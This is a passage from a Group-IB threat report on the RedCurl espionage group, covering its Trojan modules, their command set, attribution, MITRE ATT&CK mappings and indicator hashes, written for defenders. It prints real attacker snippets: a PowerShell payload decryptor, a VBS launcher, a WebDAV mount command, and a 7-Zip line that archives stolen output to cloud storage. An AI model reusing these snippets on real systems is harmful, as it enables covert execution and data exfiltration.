Base64-encoded.\r\nBelow is a code section responsible for decryption:\r\nfunction Decrypt-CMD([BYTE[]] $key) {\r\n $path = «.\\tempexec\\cmd.txt»;\r\n $cmdname = -join ((48..57) + (97..122) | Get-Random -Count 8 | %\r\n{[char]$_});\r\n $dec = Get-Content $path | ConvertTo-SecureString -Key $key;\r\n $Ptr = [System.Runtime.InteropServices.\r\nMarshal]::SecureStringToCoTaskMemUnicode($dec);\r\n $result = [System.Runtime.InteropServices.\r\nMarshal]::PtrToStringUni($Ptr);\r\n [System.Runtime.InteropServices.\r\nMarshal]::ZeroFreeCoTaskMemUnicode($Ptr);\r\n $bytes=[Convert]::FromBase64String($result);\r\n $bytes | Set-Content «.\\tempexec\\${cmdname}.bat» -Encoding Byte\r\n-Force;\r\n Start-Sleep 10;\r\n Remove-Item .\\tempexec\\cmd.txt -Force; return $cmdname;\r\n}\r\nThe file “enc/cmd.txt” is downloaded to the “.\\tempexec” directory,\r\nfrom which the FirstStageAgent module is launched. The module\r\ndecryption function reads the contents of the downloaded file and\r\ndecrypts it using the above algorithm (ConvertTo-SecureString\r\n-\u003e Base64). The decrypted module is written to the same direc-tory. A random sequence of 8 characters is generated as a name\r\n(example: “[a-z0-9]{8}.bat”). At the last stage of its operation,\r\nFirstStageAgent deletes the downloaded file from the system and\r\nruns the decrypted file.\r\nAfter execution, all commands (modules) and created files are\r\ndeleted using the sdelete utility.\r\nAs such, all communications between the threat actor and the\r\ncompromised infrastructure are carried out using legitimate\r\ncloud services.\n\n26\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nChannel1\r\naka RedCurl.C1\r\nand Channel2\r\naka RedCurl.C2\r\nCommands\r\nThe modules Channel1 and Channel2 have the same functions.\r\nTheir main goal is to upload information about the infected device,\r\nthen download and execute a new module with commands. The\r\nencryption method and the algorithm for receiving and sending\r\ndata are the same as for FirstStageAgent. Each module uses differ-ent accounts to access the cloud storage.\r\nThe main difference between the modules is the way they com-municate with the cloud storage. Channel1 and FirstStageAgent\r\nuse the “curl.exe” utility to interact with the cloud, while Channel2\r\nmounts a network drive into the system. Mounting is carried out\r\nusing the “net.exe” utility. All subsequent operations with files\r\nlocated in the cloud are performed using console commands.\r\nAn example of a command used to mount a network drive is pre-sented below:\r\nnet use https://storage.driveonweb.de/probdav $pass /user:$login /\r\npersistent:no;\r\nAnother feature that distinguishes Channel2 from Channel1 is the\r\nway of launching the decrypted module with commands. Channel2\r\nuses a VBS script that is run by a common program called “wscript.\r\nexe”. The path to the module is passed as an argument. Once the\r\nscript is run, a “WScript.Shell” object is created, which is then used\r\nto launch a decrypted BAT file. An example of the VBS script is pre-sented below:\r\nOn Error Resume Next\r\nCreateObject(«Wscript.Shell»).Run «»»» \u0026 WScript.Arguments(0) \u0026\r\n«»»», 0, False\r\nChannel1 launches the decrypted module in the same way\r\nas FirstStageAgent.\r\nThe FirstStageAgent, Channel1, and Channel2 modules only download\r\nand execute commands (modules) in the “cmd.exe” command-line\r\ninterpreter. Each downloaded file is a separate module with com-mands that extend the Trojan’s functionality. This means that these\r\nTrojan commands are subprograms or modules.\r\nCertain modules can execute PowerShell commands. In such cases,\r\nthey are Base64-encoded and stored in the file with the module.\r\nModules can contain commands to download additional software.\r\nThe downloaded modules communicate with operators using files\r\nlocated in the cloud. Additional programs required for the Trojan\r\nto operate are located in the cloud directory. It is worth noting that\r\ndifferent accounts are used in the modules that store commands\r\nand the modules that run commands. However, different modules\r\nwith commands use the same account. The same module can run\r\non different machines. Modules check the computer name on which\r\nthey are running to avoid restarting on the same machine. If the\r\ncomputer name matches one of the values on the list, the module will\r\ncontinue with the execution.\n\n27\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nEach module starts by creating a temporary directory to save the\r\nresult of its operation. The directory that stores a module that\r\nlaunched the command is used as a working directory. The directory\r\nname is located in the file with the downloaded module. In the mod-ules analyzed, the directory names are based on the following pat-tern: “temp[0-9]{2,4}”.\r\nThe output of each command is added to a password-protected\r\narchive. To create the archive, a console version of the 7-Zip program\r\n(syspack.exe) is used. The program is delivered to the infected device\r\nin advance. The password for the archive is contained in the file and\r\nis unique for each module. After files have been added to the archive,\r\nthey are removed from the system. The archive name is generated\r\nusing the following template:\r\n%computername%_%username%_%%CMD_NAME%%_[%random%]_\r\n[%DD%%MM%|%MM%%DD%]_%HH%%MM%.tmp.\r\nThe month and day will be determined correctly only if the “DD.\r\nMM.YYYY” or “MM.DD.YYYY” date format is set in the system. The\r\n%random% field may be missing in some cases. The %CMD_NAME%\r\nfield depends on the module’s purpose. An example of a command\r\nused to create an archive is presented below:\r\nsyspack.exe a -p%packpass% -mhe=on -sdel -y \\\\app.koofr.net@SSL\\\r\ndav\\Koofr\\STR\\%ARCH_NAME% %LOG_FOLDER%\r\nModules were named based on the value of the %CMD_NAME%\r\nfield. Below is a list of the detected modules:\r\nModule Description\r\ninf Collects information about the infected system\r\ndom, d1 Collects information from Active Directory\r\ndn, mlist Collects information about users in Active Directory\r\nps Harvests credentials from the infected machine using LaZagne\r\nsh Collects logs from the infected machine. In some cases, it deter-mines the contents of a directory located on the local network\r\ndnlog Collects a list of computers on the local network\r\nins, inst Infects files on shared resources within the network\r\nunins Removes files intended for distribution within the network\r\nshares Obtains a list of available network drives at the address\r\ncheck, chk Checks access to the network drive and obtains a file list\r\ndl, difs, difs2 Obtains a list of files on a network drive\r\nml Exfiltrates emails\n\n28\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nModule Description\r\nmi01 Launches a DLL file\r\ndepmpunins Removes traces of compromise from the infected machine\r\np1, plz232 Collects system information along with credentials\r\nfs01 Obtains a list of files in a directory on a network drive\r\nfs02 Checks the internet connection\r\nustunlog Configures access to the infected machine via SSH\r\ndl1 Exfiltrates data\r\nch2, tmp Obtains a list of files from temporary directories of other modules\r\nsha Obtains a list of available resources for computers within the local\r\nnetwork\r\ncre Creates a fake window for entering the computer account\r\npassword\r\ncreds Same as the cre module\r\nfld Exfiltrates data from local and network directories\r\nres Obtains a list of files stored on the local computer\r\nrf Obtains attributes of files located on a network drive\r\n2 Alive\r\nflg Exfiltrates certain files from network directories\r\nwrf Collects a list of directories on network drives that have\r\nwrite access\n\n29\r\n© GROUP−IB\r\nAttrib u ti o n\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nAttribution\r\nRedCurl’s focus on espionage and the use of public cloud ser-vices may indicate that its campaigns are a continuation of the\r\nRedOctober and CloudAtlas campaigns described by Kaspersky\r\nLab in the past (https://securelist.ru/cloud-atlas-stilnoe-vozvrash-henie-art-kampanii/24716/, https://securelist.com/recent-cloud-at-las-activity/92016/). These cyberespionage attacks targeted\r\nindustrial, governmental, and commercial organizations in Russia,\r\nCentral Asia, and Ukraine. They were carried out between 2010\r\nand 2019. At the time of writing, there is no information about\r\nattacks involving CloudAtlas tools in 2020.\r\nRedCurl, discovered by Group-IB experts, carried out attacks\r\nat different intervals between 2018 and 2020 inclusive. The earli-est attack dates back to May 2018. Its victims included companies\r\nbased in the UK, Canada, Norway, Germany, Russia, and Ukraine. All\r\nthe companies were private and commercial.\r\nAs such, based on the geographical scope of attacks, it is impossi-ble to confirm any links with the campaigns described by Kaspersky\r\nLab.\r\nAnalysis of RedCurl revealed that one of the SFX archives was cre-ated using the WinRAR utility set to Russian. This fact is confirmed\r\nby the strings in the section with resources. Moreover, Russian was\r\nset in one of the profiles used as a C\u0026C server.\r\nFigure 16. Language in the cloud\r\nweb interface\r\nFigure 17. SFX archive resources\n\n30\r\n© GROUP−IB\r\nAttrib u ti o n\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nRedCurl, CloudAtlas and RedOctober:\r\ncampaign comparison\r\nRedCurl CloudAtlas RedOctober\r\nInitial access SFX archives,\r\nLNK files,\r\nXLAM documents,\r\nJS files\r\nPhishing document\r\ncontaining the following\r\nexploits:\r\nCVE-2017-11882\r\nCVE-2018-0802\r\nPhishing document\r\ncontaining the following\r\nexploits:\r\nCVE-2009-3129\r\nCVE-2010-3333\r\nCVE-2012-0158\r\nCommand • Obtains information about the infected machine\r\n• Exfiltrates data\r\n• Obtains a directory listing\r\n• Propagates across the compromised network\r\n• Sets up access to the\r\ncompromised machine\r\nvia SSH\r\n• Creates a phishing\r\nwindow with a form\r\nfor entering domain\r\naccount credentials\r\n— • Keylogger\r\n• Takes screenshots\r\n• Exfiltrates data from\r\nmobile devices\r\n• Extracts passwords using the LaZagne tool —\r\nC\u0026C communication\r\nprotocol\r\nWebDAV\r\nLateral movement Substitutes original\r\ndocuments on a network\r\ndrive with LNK files\r\n— Scans network\r\ncomputers for the\r\nMS08-067 vulnerability\r\nOpen-source tools used LaZagne, 7-Zip —\r\nADExplorer\r\nNirCmd\r\nSSH\r\ncurl\r\n— —\r\nThe RedOctober, CloudAtlas, and RedCurl campaigns all involved\r\na modular Trojan. The C\u0026C servers sent commands in separate\r\nmodules. The RedOctober campaigns and early CloudAtlas attacks\r\nused the WebDAV protocol to communicate with operators, just\r\nlike the RedCurl campaign. However, the tools used in RedCurl\r\nattacks are unprecedented and written in PowerShell. The lat-est CloudAtlas attacks also used a new PowerShell tool, which\r\nGroup-IB classified as PowerShower. Analyzing this tool did not\r\nreveal overlaps in the code with any RedCurl tools. LaZagne was\r\nused to retrieve passwords as part of all the campaigns. A detailed\r\ncomparison between the campaigns based on the\r\nMITRE ATT\u0026CK® matrix is presented below.\n\n31\r\n© GROUP−IB\r\nAttrib u ti o n\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nMITRE ATT\u0026CK® Mapping (RedCurl)\r\nTactic Technique Procedure\r\nTA0001: Initial Access T1566.002:\r\nSpearphishing link\r\nThe cybercriminals used phishing emails with links to SFX archives\r\nto gain initial access to the target host.\r\nTA0002: Execution T1204.002:\r\nMalicious File\r\nThe victim must launch an executable file and open an LNK, XLAM,\r\nMHT or JS file for the infection to start.\r\nT1059.003: Windows\r\nCommand Shell\r\nThe cybercriminals used cmd.exe to execute batch scripts.\r\nT1059.001:\r\nPowerShell\r\nThe cybercriminals used PowerShell scripts to perform post-exploitation tasks.\r\nT1059.005:\r\nVisual Basic The cybercriminals used VBScript to run batch files.\r\nTA0003: Persistence T1053.005:\r\nScheduled Task\r\nThe cybercriminals created tasks in the scheduler to achieve\r\npersistence on compromised systems.\r\nT1547.001: Registry\r\nRun Keys / Startup\r\nFolder\r\nThe cybercriminals created entries in the HKCU\\Software\\\r\nMicrosoft\\Windows\\CurrentVersion\\Run registry key to achieve\r\npersistence on compromised systems.\r\nTA0005: Defense Evasion T1027: Obfuscated\r\nFiles or Information\r\nThe cybercriminals encrypted data and Base64-encoded\r\nPowerShell commands.\r\nT1036.005: Match\r\nLegitimate Name\r\nor Location\r\nThe cybercriminals masked their scripts and tasks in the scheduler\r\nusing names similar to legitimate ones.\r\nT1070.004: File\r\nDeletion\r\nThe cybercriminals removed batch scripts immediately after\r\nexecution.\r\nT1564.001: Hidden\r\nFiles and Directories\r\nThe cybercriminals added the “hidden” attribute to malicious\r\nlibraries and files to which malicious LNK files pointed.\r\nT1218.011: Rundll32 The cybercriminals used rundll32.exe to launch RedCurl.Dropper.\r\nTA0006: Credential\r\nAccess\r\nT1003.001: LSASS\r\nMemory\r\nThe cybercriminals used LaZagne to extract passwords from\r\nvolatile memory.\r\nT1555.003:\r\nCredentials from Web\r\nBrowsers\r\nThe cybercriminals used LaZagne to extract passwords stored\r\nby web browsers.\r\nT1552.001:\r\nCredentials in Files\r\nThe cybercriminals used LaZagne to extract passwords stored\r\nin files.\r\nT1552.002:\r\nCredentials\r\nin Registry\r\nThe cybercriminals used LaZagne to extract passwords stored\r\nin the registry.\r\nT1056.002: GUI\r\nInput Capture\r\nThe cybercriminals used a phishing Microsoft Outlook\r\npop-up to intercept login credentials.\n\n32\r\n© GROUP−IB\r\nAttrib u ti o n\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nTactic Technique Procedure\r\nTA0007: Discovery T1082: System\r\nInformation\r\nDiscovery\r\nThe cybercriminals regularly collected information about\r\ncompromised systems.\r\nT1035: Network Share\r\nDiscovery\r\nThe cybercriminals collected information about network drives\r\navailable to compromised hosts.\r\nT1083: File and\r\nDirectory Discovery\r\nThe cybercriminals collected information about files on local and\r\nnetwork drives.\r\nT1087.001: Local\r\nAccount\r\nThe cybercriminals collected information about local accounts.\r\nT1087.002: Domain\r\nAccount The cybercriminals collected information about domain accounts.\r\nT1087.003: Email\r\nAccount\r\nThe cybercriminals collected information about email accounts.\r\nTA0008: Lateral\r\nMovement\r\nT1080: Taint Shared\r\nContent\r\nThe cybercriminals placed modified LNK files on network drives,\r\nwhich allowed them to propagate across the network.\r\nTA0009: Collection T1119: Automated\r\nCollection\r\nThe cybercriminals used batch scripts to collect data.\r\nT1005: Data from\r\nLocal System\r\nThe cybercriminals collected data from the local disks\r\nof compromised systems.\r\nT1039: Data from\r\nNetwork Shared Drive\r\nThe cybercriminals collected data from network drives.\r\nT1114.001: Local Email\r\nCollection\r\nThe cybercriminals collected emails.\r\nTA0011: Command\r\nand Control\r\nT1102: Web Service The cybercriminals used legitimate web services to download\r\nmalicious batch scripts.\r\nT1071.001: Web\r\nProtocols\r\nThe cybercriminals used the HTTP, HTTPS, and WebDav protocols\r\nto perform network connections.\r\nTA0010: Exfiltration T1020: Automated\r\nExfiltration\r\nThe cybercriminals used batch scripts to exfiltrate data.\r\nT1537: Transfer Data\r\nto Cloud Account\r\nThe cybercriminals used cloud storage devices to copy data.\n\n33\r\n© GROUP−IB\r\nAttrib u ti o n\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nMITRE ATT\u0026CK® Mapping\r\n(RedOctober/Cloud Atlas/Inception)\r\nTactic Technique Procedure\r\nTA0001: Initial Access T1566.001:\r\nSpearphishing\r\nAttachment\r\nThe cybercriminals used phishing emails with malicious\r\nattachments to gain initial access.\r\nTA0002: Execution T1204.002:\r\nMalicious File\r\nThe device becomes infected as soon as the victim opens the\r\nmalicious document.\r\nT1059.001:\r\nPowerShell\r\nThe cybercriminals used PowerShell scripts during post-exploitation tasks.\r\nT1059.005:\r\nVisual Basic\r\nThe cybercriminals used a VBScript to run batch files.\r\nT1203: Exploitation\r\nfor Client Execution\r\nThe cybercriminals exploited CVE-2012-0158, CVE-2014-1761,\r\nCVE-2017-11882, and CVE-2018-0802 vulnerabilities to execute\r\nmalicious code.\r\nTA0003: Persistence T1547.001: Registry\r\nRun Keys / Startup\r\nFolder\r\nThe cybercriminals created entries in the HKCU\\Software\\\r\nMicrosoft\\Windows\\CurrentVersion\\Run registry key to ensure\r\npersistence on compromised systems.\r\nTA0005: Defense Evasion T1027: Obfuscated\r\nFiles or Information\r\nThe cybercriminals used AES and RC4 algorithms to encrypt the\r\npayload.\r\nT1218.010: Regsvr32 The cybercriminals used regsvr32.exe to launch malicious DLLs.\r\nT1218.005: Mshta The cybercriminals used malicious HTA files to download and\r\nexecute malicious code.\r\nT1221: Template\r\nInjection\r\nThe cybercriminals used malicious documents to download the\r\npayload from a remote server over HTTP.\r\nTA0006: Credential\r\nAccess\r\nT1003.001: LSASS\r\nMemory\r\nThe cybercriminals used LaZagne to extract passwords from\r\nvolatile memory.\r\nT1555.003:\r\nCredentials from\r\nWeb Browsers\r\nThe cybercriminals used LaZagne to extract passwords stored\r\nby web browsers.\r\nT1552.001:\r\nCredentials in Files\r\nThe cybercriminals used LaZagne to extract passwords stored\r\nin files.\r\nT1552.002:\r\nCredentials\r\nin Registry\r\nThe cybercriminals used LaZagne to extract passwords stored\r\nin the registry.\n\n34\r\n© GROUP−IB\r\nAttrib u ti o n\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nTactic Technique Procedure\r\nTA0007: Discovery T1082: System\r\nInformation\r\nDiscovery\r\nThe cybercriminals regularly collected information about\r\ncompromised systems.\r\nT1083: File and\r\nDirectory Discovery\r\nThe cybercriminals collected information about files stored on local\r\nand network drives.\r\nT1087.001: Local\r\nAccount\r\nThe cybercriminals collected information about local accounts.\r\nT1087.002: Domain\r\nAccount\r\nThe cybercriminals collected information about domain accounts.\r\nT1518: Software\r\nDiscovery\r\nThe cybercriminals collected information about the software\r\ninstalled on the compromised hosts.\r\nTA0009: Collection T1119: Automated\r\nCollection\r\nThe cybercriminals used batch scripts to collect data.\r\nT1005: Data from\r\nLocal System\r\nThe cybercriminals collected data from the local disks of the\r\ncompromised systems.\r\nT1039: Data from\r\nNetwork Shared Drive\r\nThe cybercriminals collected data from network drives.\r\nTA0011: Command\r\nand Control\r\nT1102: Web Service The cybercriminals used legitimate web services to download\r\nmalicious batch scripts.\r\nT1071.001: Web\r\nProtocols\r\nThe cybercriminals used the HTTP, HTTPS, and WebDav protocols\r\nto perform network connections.\r\nT1573.001: Symmetric\r\nCryptography\r\nThe cybercriminals used the AES algorithm to encrypt network\r\nconnections.\r\nT1090.003:\r\nMulti-hop Proxy\r\nThe cybercriminals used chains of compromised routers\r\nto communicate with cloud storage providers.\r\nTA0010: Exfiltration T1020: Automated\r\nExfiltration\r\nThe cybercriminals used batch scripts to exfiltrate data.\r\nT1537: Transfer Data\r\nto Cloud Account\r\nThe cybercriminals used cloud storage devices to copy data.\r\nThe above comparative analysis of the RedCurl, CloudAtlas, and\r\nRedOctober campaigns shows that, despite similarities between\r\nthe attacks, it is impossible to assert unequivocally whether\r\nRedCurl is a continuation of the CloudAtlas and RedOctober\r\ncampaigns or linked to them in any way.\n\n35\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nIoCs\r\nSamples\r\nDate Hashes Classification\r\n2018-06-11 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 571cba0332280827b067612f04f43f2b\r\nSHA1: c2614da1b29293505fd71589641adfc5161a1146\r\nSHA256: a5016649ea75e7c627ce7dfd794a89f66ff113633abd9cd37fe79270336\r\nacbca\r\nEncoded\r\nRedCurl.FSA\r\nMD5: cc9460fa24872509eae5bd6496858202\r\nSHA1: 21e08a4ebff766c25b1df255a1efc3f39dd1180c\r\nSHA256: c9ad954dea815ef6fd7013b3ba2f476b65d13a9907dabc7ab3b13fee72c\r\n46ad6\r\nEncoded\r\nRedCurl.C1\r\nMD5: b15c556a02ae0779781d1e1a8bf60ff2\r\nSHA1: 6d488096fae4916dab8a17c43eb2ce8cee340616\r\nSHA256: 3a962d97ca4fde28feae125d1460e25df33cfb47a6ddc60a2c12e0060\r\n244547e\r\nEncoded\r\nRedCurl.C2\r\n2018-07-04 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 8292f62c1583a79021ad5e7654b33fd3\r\nSHA1: d13feeac312e7a43340ef3ef6df28b4f53209016\r\nSHA256: 4705ebee308ace8f17f333fb394eafa85893def238fc1383895c0bacf\r\nfcda032\r\nEncoded\r\nRedCurl.FSA\n\n36\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2018-07-04 MD5: 6a5eef605d8cfccf00f636ca7021e590\r\nSHA1: b5922c93e70840125617ba36a3651413c641e558\r\nSHA256: 402d12e5ec939db389bf5713af5c90b25fc2f1ba7f653ec9454140f32fc\r\na2f7b\r\nEncoded\r\nRedCurl.C1\r\nMD5: 40ee1d475ff236b83d61c563ad5d261d\r\nSHA1: dd4392b4c06a24b615d7672a90d4c0bf43425efe\r\nSHA256: 7356f7bbb0168c3eff59613add94f5f2d8ee2cd2b796fe37f56b722121f5\r\nc92d\r\nEncoded\r\nRedCurl.C2\r\nMD5: 5f6d12a1f6a58f0abab1e214c5fcc872\r\nSHA1: 126fb5c821e4d9e3cd22fb4076c718e6c7048537\r\nSHA256: 125b81f93be005d9709af4c95bc4b4449aeb3c2af36730c3441a26744\r\n4cfa8cd\r\nEncoded\r\nRedCurl.FSA\r\n2018-07-04 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 6272b59b5090f45639a5a26ad8f98365\r\nSHA1: fc6d0882cafc128ea44dfb82a8612c28246457ba\r\nSHA256: 55327d92ee6f11faec64a6dc9a5088940458610b05671a766a4874b\r\n32ca30035\r\nEncoded\r\nRedCurl.FSA\r\n2018-12-01 MD5: 9691daebab79c6ab48adac73bda0a84a\r\nSHA1: 4d068039476fe2e5a883d08d3b16827ab2442a1f\r\nSHA256: af4983c6a86105d1b7f1c73e1ce7ea4710d5f5c7dbdf14d87132279346da\r\nd96f\r\nRedCurl.\r\nInitialDropper\r\nMD5: aff86bd355a746208fcf31de9707ae0b\r\nSHA1: d80dea264dc6621223b3f91564c71699f4d20d6b\r\nSHA256: 8353529d98b32d45a403128f03a3e8f6cc21f9dfb9362b9898eb0e4d\r\nc3bd807f\r\nRedCurl.FSA_light\r\n2019-07-02 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 2375e40fb45efecc4e162449ea1fb479\r\nSHA1: a7a170ea16b4fb567da7656f9690977129bf022b\r\nSHA256: abb51a52a9bb5342ed2f1acb9f4c802d7333f8f493b2970dc9767e5bc\r\n608514a\r\nRedCurl.Dropper\r\nMD5: 2abdcca9bdfa79e22f49af21082422f1\r\nSHA1: 9921aaba1bc6ac7c2002db7b395d2d6fce232b05\r\nSHA256: 684f231c7ec0fde283d559cad729acdadcda8644b8054a40bda2f078\r\ned777e79\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: aa57b416608949c5dcf9f496832f317e\r\nSHA1: 6e4a0fc3b901a1eb2d7dad87e08bbe8176df27ca\r\nSHA256: fe03a9a0a2df2e8580a990b7dbd7e6915e1bd56a3716cdc686b39a97\r\n3ac945b7\r\nEncrypted\r\nRedCurl.C1\n\n37\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2019-07-02 MD5: 5294c19eea035302410711b718cd623e\r\nSHA1: a32edf29e9dd334d938e7d43bf5f23e5e2e1379b\r\nSHA256: 14c02e489f2593f5a4f13dba6ea4675e4fe233081a90fa2deeb1e7afcc5\r\nb7cfb\r\nEncrypted\r\nRedCurl.C2\r\n2019-07-10 MD5: e18e269de42033065baeaf3e1bba0cf7\r\nSHA1: 2bc166ae7482ab1fc164a82333d52f562e3ebcf2\r\nSHA256: ba7278b2d7087d2cdd0af9ca298edbab5e134d31ac33da7378c28032\r\nb2894b69\r\nRedCurl.Dropper\r\nMD5: aa625ac2df396bb478eee6a875083dc6\r\nSHA1: 1e799d277564f5e2dc02765d67baa2b001eb3c14\r\nSHA256: 9bfda16318e0a1875f2c527196e6ecec8b818663bbfd26b40ae2c3\r\n10aa234834\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: fd3f1940afc2b429bc56c0b55f356944\r\nSHA1: 9544021eca90f2b61c00b1f3d964eada46c4069f\r\nSHA256: dac83995f978a8917bca8577ddcbb43efdb9889db82d112dd547e0\r\nd52d277866\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 8048a791b5946dd68a1fc8ca5358ec75\r\nSHA1: 0536f010e53e68844875d635b9af896b98b7b7f9\r\nSHA256: 7e0221f3bfeec83733324479380677fe0f86fc8f35a98d45bc91f1408eff\r\n421b\r\nEncrypted\r\nRedCurl.C2\r\n2019-07-18 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 40ef07b3221d9846d892c42d10b7220e\r\nSHA1: e8c2b3f99fccd983fb8245d9523687e6f3d9e7c0\r\nSHA256: fb590ffe5abbbae1e44f7db0081d4fb63b9be88c33cbeed7e8b61af6fb\r\n9d184f\r\nRedCurl.Dropper\r\nMD5: f215b71695e8f5f4ddf50466e853cc42\r\nSHA1: 37bd8f99b48d3c4ba2d961a2845500d49f6d0b67\r\nSHA256: d8e25f8abb73f4c14c80d65fcb26cefca276ddbf184145be5dca2ed553\r\nc784b2\r\nEncrypted\r\nRedCurl.FSA\r\nMD5:313ede2578a6d8ab5a1b558a78759085\r\nSHA1:eab481f339cd5f64bc91c7718ccdc7997bb717d6\r\nSHA256: c12e73c1422138b496c4632115a69acfad3a3603979bf78f6f54ed7a2da\r\nce22b\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 3becc75bfd9c8d3fd19b8486ba980ce4\r\nSHA1: 5ded57ebeb26d53926338f350e5ff3c5b97c355b\r\nSHA256: 20bde46e621f2c18402d9f32ea8021525b8f0af27977210c0fde74c6c0\r\n117d36\r\nEncrypted\r\nRedCurl.C2\r\n2019-07-25 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\n\n38\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2019-07-25 MD5: b096449ed0ca654ae166bc141bd22335\r\nSHA1: c9f2ed153f54faab782fde4d7b99b8a76165b43b\r\nSHA256: 9a1660ba58e40a6bff8db84d43fbdf4bf5c950dd2473021dadfde20f10\r\n0641e1\r\nRedCurl.Dropper\r\nMD5: da62ada98b1b0c6ecb5d47eab1e9519e\r\nSHA1: 3e8594a9ae1b779502dad2783a32be3708121ee6\r\nSHA256: 67ac0312de78b8f3d8cb3202cf109a19593407cba10d53d24e21750b7\r\n7463b7a\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: b1479513a24a37e4e3b0c38d6535cf21\r\nSHA1: 6a3132c2d2663c70cbf91c3b6e412de6a9b2000f\r\nSHA256: 9f73b30c0c8fca4950ac7de0497fec3104fb747df07550125987e546ec\r\n39ff84\r\nEncrypted\r\nRedCurl.C1\r\nMD5: b2e91b4b714adbe826dbb5692db78453\r\nSHA1: 8a7dc93cb358dfa3ede7ebe6215200541a5d2350\r\nSHA256: 0ab7a99db824bc6435f6c0b9b8228398e50c572620f40e392e4\r\nafdf163133274\r\nEncrypted\r\nRedCurl.C2\r\n2019-07-25 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 98e9ab41cc8756fb15edaf879200d414\r\nSHA1: 18f5abb55e372c59d35665b125a3facd39406d0a\r\nSHA256: 47ea69945bbeb18bce1c0446f00cc6b2ed29836238a8c76b1078fc4f6\r\ne2a08d2\r\nRedCurl.Dropper\r\nMD5: 484bb302a2ca940f562be418e1b67eee\r\nSHA1: 1d4b869153121c47b97901dfe9b0a595d3a41b65\r\nSHA256: 3cae215d0fb22e64034a7c5364a5498d31a8409ec46621809855c05\r\n7c88c6f91\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 948ccaba625e5073730cef8c0d21f894\r\nSHA1: a31c0046f06c9274adc322363045b7a6e01ccc9e\r\nSHA256: a06cd437c52eafc2f577ab4598e590990cfda4dd9eeb5a20ddd2376ff\r\n873638d\r\nEncrypted\r\nRedCurl.C1\r\nMD5: edab30e2d72f62f9056398e85d31195d\r\nSHA1: af8e1aa9e57b2dae655b6b2a0c3b3ec15878a57d\r\nSHA256: 1c1608cb2e48e68cd961994484de3aed68b35b1c5f118040f0336a5eb\r\na9d50af\r\nEncrypted\r\nRedCurl.C2\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\n\n39\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2019-07-25 MD5: dcf33e6f22ed5a24fb8e2c507770f278\r\nSHA1: 19a1b5c4153bbe082b43688f57b4a02ffbc3f06c\r\nSHA256: 82e21853c392a31ec1751e58bd98abb50ecfb19afc7d6bb6e9e4f0cc45\r\n38eda5\r\nRedCurl.Dropper\r\n2019-07-30 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 3E36E2AF206B6C41847161C58C777554\r\nSHA1: 679A71094CD62D342CFD189F178E7D8CDDC5D0C1\r\nSHA256: 6EA64629B17DA6923AD58680CE769B545E9A75E3FC7B86CB9756B\r\n1D3E85D7A2D\r\nRedCurl.Dropper\r\nMD5 f2fe7442b9017dcfe146ebea85a631e7\r\nSHa1 a608509665e6f07e407c636fdafc9a364df9ba89\r\nSHA256 0f3e14d24ef31e6acdd491a5406818a4526741e04d080b6c2d28547ec\r\n9fb42d5\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 8734bfe951847a5b577f01088c5cc803\r\nSHA1: 6ed0375d527cc8855f435777f68d4924cf24957b\r\nSHA256: fe1dbf4420d247b7e55b9a313b83d7ec9833efa1e1c7d169aeeb7a5ef3\r\n2c8c09\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 2c100f7835627ab7acb5cb58dfd04b8d\r\nSHA1: f16bc12267399b61e779a380962372ba403bcff9\r\nSHA256: 22bbdd147f52ab3e93380ba788fb605ae7f2e94ff378b7b264636b8411\r\n62ed6\r\nEncrypted\r\nRedCurl.C2\r\n2019-07-31 MD5: 4adf6dff493427be125d6708a93151aa\r\nSHA1: 08d429f8ba3218b9442f6c00d33988fe8d924cab\r\nSHA256: 3a27ed7030ec08fd35c6c3ffd7c89bb2a40569c09841f11f20c064\r\n5edf376904\r\nRedCurl.Dropper\r\n2019-08-14 MD5: **********\r\nSHA1: 